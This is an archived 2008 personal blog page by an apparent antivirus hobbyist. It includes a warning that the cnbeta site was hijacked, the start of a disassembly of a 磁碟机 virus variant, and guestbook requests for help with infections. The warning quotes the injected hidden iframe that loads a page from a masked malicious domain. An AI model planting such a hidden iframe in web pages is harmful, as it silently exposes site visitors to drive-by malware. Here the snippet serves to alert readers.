清新阳光
百度首页 | 百度空间
 
总置顶
 
 
 
 
     
 
文章列表
 
2008-06-19 00:33

作者:清新阳光                                                            (

 
2008-06-08 20:21

2008年6月8日晚20时左右发现cnbeta被挂马 在网页前面加入了如下代码:

<iframe src=http://www.******.info/hao4.htm width=100 height=1></iframe>    

请注意,暂时不要访问cnbeta~

 
2008-05-19 20:03
没有声音 没有征兆

突然

天摇地晃

沉默 随即是各种奔跑

醒悟 原来是地震来临

里氏7.8

 
2008-03-29 16:18

作者:清新阳光                                                            (

 
2008-03-25 23:47

作者:清新阳光                                                            (

 
2008-03-07 16:33

作者:清新阳光                                                            (

 
2008-02-28 14:01

作者:清新阳光                                                            (

 
2008-02-04 22:30

作者:清新阳光                                                            (

 
2008-01-20 10:25

昨天花了一晚上时间跟踪了磁碟机的新变种的主程序(setup.exe) 发现了原先没有发现的一些东西,做个笔记吧~~汇编刚开始学,还希望大牛们指导指导哈^_^

这里只写出原来没有分析出来的部分~~

00402111 |> /8D85 E4FEFFFF /LEA EAX,DWORD PTR SS:[EBP-11C]
00402117 |. |8D4D F0       |LEA ECX,DWORD PTR SS:[EBP-10]
0040211A |. |50            |PUSH EAX
0040211B |. |E8 32680000

 
2008-01-17 00:14

作者:清新阳光                                                            (

 
2008-01-12 23:56

作者:清新阳光                                                            (

 
2008-01-05 20:28

作者:清新阳光                                                            (

 
2008-01-03 11:32

  看了小聪的"答阳光,关于pagefile.pif对付安全软件行为的实现举例"觉得自己实在是差距太大了。

  曾经和他探讨过,反病毒道路上有几座山,第一座山是帮人看看日志,帮人处理处理问题,这充其量也就是算个小山头,聪明点的人估计有一个月就会了,而且这也不叫真正的反病毒,这叫客服;第二座山是装个虚拟机测测病毒,看看现象,这也不难,豁得出去时间,多练练也就OK了;第三座山则是真正的入行山,通过反汇编看代码分析病毒,从小聪的近来的文章可以发现,通过他自己不懈的努力,他已经可以看到这座山背

 
2008-01-01 15:07

作者:清新阳光                                                            (

 
2007-12-22 11:39

作者:清新阳光                                                            (

 
     
 
留言板
 
309
你这成病毒研究中心了 哈哈

2008-07-04 13:26
 
308
306,要看STENG
日志还是自己钻研下吧。我按照别人给总结的方法自己看,结果把系统整崩溃了5555555555,你要小心
2008-07-01 10:15
 
307
我也在研究病毒和网页挂马,你有联系方式么?交流交流
2008-06-19 19:24
 
306
指导一下初学者怎么看STENG日志,不胜感谢。
2008-06-13 02:27
 
305
中了个run.vbs       FF.BAT

这2个病毒。    我装的是卡巴
反复的跳出来。。

后来导致机器变慢。   重装了2次系统。。不到1小时它又来了。。

    折腾了我好几天了。。。 帮帮我吧    QQ 127802805
2008-05-01 02:36
 
 
姓 名:    注册
网 址: (选填)
内 容:
验证码:
 
   
 
 
个人档案
 
newcenturysun
男, 22岁
天津 
上次登录:
6月19日
加为好友
 
   
 
日历
 
     
 
RSS订阅
 
   
 
好友最新文章
 
     
 
背景音乐
 
 
最近访客
 
 

小肥虾2007

Sensitish

332339959

hx177

wevol

lyzhack

蓝翼勾勒

张雄在北京
     
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2008 Baidu